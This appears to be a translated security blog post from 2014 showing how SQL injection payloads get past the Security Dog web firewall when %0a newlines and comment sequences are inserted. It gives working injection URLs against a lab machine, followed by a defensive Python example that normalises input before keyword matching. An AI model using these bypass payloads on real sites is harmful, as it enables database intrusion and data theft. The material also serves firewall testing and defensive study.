Test time: 2014.10.21
Tested versions: IIS version V3.3.09476 (2014-09-24) and Apache version V3.1.08512 (2014-05-29); both are the latest versions available as of today.
Core character used for the bypass: %0a. In some special cases it needs to be combined with a comment sequence.
Detailed test steps:
1. On the local machine an injectable v5shop instance is installed (IIS 6 + ASPX + MSSQL 2005, used to test the IIS version of Security Dog). A normal injection test:
http://192.168.91.152/cart.aspx?act=buy&id=1 and 1=user
"and" is identified as a keyword and the request is intercepted.
2. Add %0a and try again:
http://192.168.91.152/cart.aspx?act=buy&id=1%0aand 1=user
The request bypasses the filter and the injection succeeds.
In addition, in the Apache + PHP + MySQL environment:
The injection attempt is first made in the usual way:
http://192.168.91.152:8000/about.php?did=2 and/**/(select user())="
It is intercepted, because "and" and "user()" are keywords on the blacklist. Then we add %0a and try again:
http://192.168.91.152:8000/about.php?did=2%0aand/**/(select%0auser())="
http://192.168.91.152:8000/about.php?did=2%0aand/**/(select%0auser())='root@localhost'
Of course, %0a is only one line of thinking. It can be extended to several stacked %0a characters, or mixed with the comment sequences -- and /**/. For example:
http://192.168.91.152:8000/about.php?did=-2%0aunion--%0aselect%0auser()
Bypassed successfully, without any difficulty.
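As an added example (not part of the original post and not Security Dog's own code), the following Python shows why a newline slips past a keyword blacklist and how a filter that canonicalises the parameter before matching catches the same requests. The naive matcher is an assumed model of the weak rule (splitting on literal spaces), not the product's real rule set; the URLs are the post's own test requests.

```python
"""
Keyword-blacklist bypass via %0a: naive matcher vs. normalising matcher.

naive_blacklist() is a hypothetical model of a weak WAF rule that tokenises
on literal spaces only; it is an assumption about the failure mode, not
Security Dog's implementation. normalized_blacklist() decodes, strips SQL
comments and collapses all whitespace/control characters before matching.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

KEYWORDS = {"and", "or", "union", "select", "user()"}

# The post's test requests (host 192.168.91.152 is the post's lab machine).
SAMPLE_URLS = [
    "http://192.168.91.152/cart.aspx?act=buy&id=1 and 1=user",
    "http://192.168.91.152/cart.aspx?act=buy&id=1%0aand 1=user",
    'http://192.168.91.152:8000/about.php?did=2 and/**/(select user())="',
    'http://192.168.91.152:8000/about.php?did=2%0aand/**/(select%0auser())="',
    "http://192.168.91.152:8000/about.php?did=-2%0aunion--%0aselect%0auser()",
]


def naive_blacklist(value: str) -> bool:
    """Hypothetical weak rule: drop /**/ comments, split on ' ' only, compare tokens."""
    value = re.sub(r"/\*.*?\*/", " ", value.lower(), flags=re.S)
    return any(tok in KEYWORDS for tok in value.split(" "))


def normalize(value: str) -> str:
    """Canonicalise a decoded query value so keyword matching sees one form."""
    # 1. Percent-decode until stable, so double encoding (%250a) is unwrapped too.
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    value = value.lower()
    # 2. Remove SQL comments: /* ... */, and -- up to end of line or end of input.
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    value = re.sub(r"--[^\n]*\n", " ", value)
    value = re.sub(r"--.*$", " ", value)
    # 3. Collapse every whitespace or control character (\n, \r, \t, ...) to one space.
    value = re.sub(r"[\s\x00-\x1f]+", " ", value)
    # 4. Normalise "user ()" to "user()".
    value = re.sub(r"\s*\(\s*\)", "()", value)
    return value.strip()


def normalized_blacklist(value: str) -> bool:
    """Match keywords against the canonical form; word boundaries avoid 'android' etc."""
    pattern = r"(?<![a-z0-9_])(?:and|or|union|select|user\(\))(?![a-z0-9_])"
    return re.search(pattern, normalize(value)) is not None


def check_url(url: str) -> dict:
    """Return {param: (naive_verdict, normalized_verdict)} for each query parameter."""
    verdicts = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        verdicts[name] = (naive_blacklist(value), normalized_blacklist(value))
    return verdicts


if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(url)
        for name, (naive, norm) in check_url(url).items():
            print(f"  {name}: naive={'BLOCK' if naive else 'pass'} "
                  f"normalized={'BLOCK' if norm else 'pass'}")
```

Run as a script, every %0a variant passes the naive matcher and is blocked by the normalising one. Canonicalising before matching removes this whole class of whitespace and comment tricks from a filter, but it only narrows the bypass surface; the application itself still needs parameterised queries so that a request reaching the database cannot change the query's structure.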
This method is for study only and should not be used for illegal purposes. If you reprint it, please retain the copyright notice (Std Brother Company).
Also: the tested Security Dog versions are packaged at http://pan.baidu.com/s/1c05v54k (contains the IIS and Apache versions).
Original address: http://www.91ri.org/11138.html
Website Security Dog Latest version bypass test